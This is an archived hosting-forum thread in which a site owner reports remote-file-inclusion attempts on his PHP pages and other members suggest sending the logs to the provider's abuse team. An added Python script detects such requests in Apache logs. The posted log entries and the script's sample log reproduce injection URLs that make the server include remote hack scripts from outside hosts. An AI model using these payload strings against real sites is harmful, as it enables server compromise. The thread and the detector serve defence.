Full Version: Hack attempt from The Planet IP...
The Planet Forums > System Administration > Other
Aerosmith
I was just reviewing some of the tracking on one of my sites and I see this...

http://www.mydomain.com/poll/comments.php?...uk/id/mic22.txt?
2008-03-21
13:01:05
66.98.216.89

When I look up that IP in Arin I see that it is a The Planet IP.


As you can clearly see if you load that appended TXT file into a browser window, it is a php hack script. Why is someone from The Planet running a hack script on one of my servers?
Kevin Hazard
QUOTE (Aerosmith @ Mar 21 2008, 03:07 PM) *
I was just reviewing some of the tracking on one of my sites and I see this...

http://www.mydomain.com/poll/comments.php?...uk/id/mic22.txt?
2008-03-21
13:01:05
66.98.216.89

When I look up that IP in Arin I see that it is a The Planet IP.
As you can clearly see if you load that appended TXT file into a browser window, it is a php hack script. Why is someone from The Planet running a hack script on one of my servers?


I'm certainly no tech-guy, but it looks like the hack attempt is coming from a customer hosted on one of The Planet's IP addresses (rather than from someone working at The Planet). I might be entirely wrong, but if that's the case, I'm sure the abuse department would lay the smack down on them for you if you pass an email along to them.

-Kevin
Aerosmith
I would think that is a distinct and probable thing. Could as well be someone spoofing their IP. I'll forward to abuse.
Kevin Hazard
QUOTE (Aerosmith @ Mar 21 2008, 04:25 PM) *
I would think that is a distinct and probable thing. Could as well be someone spoofing their IP. I'll forward to abuse.


Awesome.

Did you see Mark calling you out in the 1,000,000 post thread?: http://forums.theplanet.com/index.php?showtopic=49093&view=findpost&p=589087
markcausa
Hahaha. http://youtube.com/watch?v=W91sqAs-_-g
James Jhurani
QUOTE (Aerosmith @ Mar 21 2008, 04:25 PM) *
I would think that is a distinct and probable thing. Could as well be someone spoofing their IP. I'll forward to abuse.


You can't spoof a fully established TCP connection, since it requires that you complete the tcp 3-way handshake.
Aerosmith
Yet another from a ThePlanet IP...

http://www.mydomain.com/?id=%7B$%7Binclude($ddd)
%7D%7D%7B$%7Bexit()%7D%7D&ddd=
http://www.idowebhosting.net/catalog/includes/sys.txt?? <<---- NOTE THIS PART
207.44.238.63
2008-03-23
08:57:40

Sad that TP allows this stuff so regularly.
Aerosmith
Yet one more....

http://www.mydomain.com/aeropolls/?id=%7B&...lude($ddd)
%7D%7D%7B$%7Bexit()%7D%7D&ddd=
http://www.mediablackouts.com/wiki/db/id.txt?
70.85.175.34
2008-03-23
08:58:40


Can anything be done to halt this or is it one of those issues that as long as I have everything buttoned up correctly all is well?
Aerosmith
Just as an FYI I have several other The Planet IPs attempting this. Here are a couple more. Seems odd that my server is having so many attempts to hack php. Any advice on how I can pinpoint why this is happening and what all I need to be aware of to prevent any harm?

209.85.107.22
74.52.9.219
markcausa
What software are you using to monitor and detect these hack attempts, Aerosmith? Mod Security?
Aerosmith
Actually the quickest way for me to find this is by viewing one of the counter scripts that I have written. These things show up as 404 errors and get flagged by that script. I have security packages installed as well, just this is something that is a very quick and easy place to see such activity.
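The 404-based spotting described in the post above can be automated. The script below is an added example, not the counter script from the thread or anything The Planet ships: it scans Apache combined-format access log lines for the two signatures visible in the URLs posted earlier, PHP code in a query string and a parameter whose value is a URL to a foreign host. The server name www.mydomain.com is the thread's placeholder, and the sample log lines are constructed.

```python
"""Flag remote-file-inclusion attempts in Apache combined-format access logs."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Combined-format entry: client IP, timestamp, request line, status code
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# Decoded query fragments seen in the thread's attempts: ${...}, include(, exit(
CODE_RE = re.compile(r'\$\{|\binclude\s*\(|\bexit\s*\(', re.I)

OWN_HOST = "www.mydomain.com"  # the server's own name (placeholder from the thread)

# Constructed sample log: two attempts modelled on the thread's URLs, one clean hit
SAMPLE_LOG = """\
207.44.238.63 - - [23/Mar/2008:08:57:40 -0500] "GET /?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 512 "-" "Mozilla/4.0"
66.98.216.89 - - [21/Mar/2008:13:01:05 -0500] "GET /poll/comments.php?id=http://example.invalid/id/mic22.txt? HTTP/1.1" 404 512 "-" "libwww-perl/5.805"
192.0.2.10 - - [23/Mar/2008:09:00:00 -0500] "GET /poll/comments.php?id=42 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""


def classify(line, own_host=OWN_HOST):
    """Return (ip, status, reasons) for a parseable line; reasons is [] when clean."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = urlsplit(m["target"]).query
    reasons = []
    if CODE_RE.search(unquote(query)):
        reasons.append("php-code-in-query")
    for name, value in parse_qsl(query, keep_blank_values=True):
        u = urlsplit(value.strip())
        # A parameter carrying an absolute URL to another host is the RFI payload
        if u.scheme in ("http", "https", "ftp") and u.hostname and u.hostname != own_host:
            reasons.append(f"remote-url-in-param:{name}")
    return m["ip"], int(m["status"]), reasons


def scan(log_text):
    """Collect flagged lines. The status is reported, not required to be 404:
    a 200 means the request reached a real script and deserves a closer look."""
    return [r for r in map(classify, log_text.splitlines()) if r and r[2]]


if __name__ == "__main__":
    for ip, status, reasons in scan(SAMPLE_LOG):
        print(ip, status, ", ".join(reasons))
```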
markcausa
QUOTE (Aerosmith @ Mar 24 2008, 09:07 AM) *
Actually the quickest way for me to find this is by viewing one of the counter scripts that I have written. These things show up as 404 errors and get flagged by that script.

Interesting...
Tomy Durden
Make sure to get those logs over to abuse at theplanet dot com so they can investigate. Some of those IP addresses look like they may, or may not, have open investigations already going, but the more information our abuse guys can get, the better off we all are.

I can't really divulge any specific information on any specific investigations.
Aerosmith
OK I'll do that... Thank you.